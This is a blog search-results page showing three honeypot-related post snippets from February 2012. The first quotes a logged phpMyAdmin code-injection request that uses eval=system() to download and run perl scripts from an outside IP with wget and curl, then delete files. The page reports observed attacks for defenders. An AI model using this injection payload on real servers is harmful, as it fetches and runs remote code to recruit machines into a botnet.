Showing 3 results for: February 2012 ×[Honeypot Alert] ×

[Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment

Our web honeypots picked up the following attacks today: 62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7...

WASC Distributed Web Honeypots Project Update

As the WASC Distributed Web Honeypots Project Sponsor, we are excited to announce that we have officially launched the next phase of the project! If you would like to participate, please read below. Project Overview The goal of the Distributed...

[Honeypot Alert] Status Report for January 2012

Monthly Web Honeypot Status Report We have received a tremendous amount of positive feedback on our web-based honeypot alert blog posts. While we agree that this data is useful for raising awareness of individual attack details, we feel that what...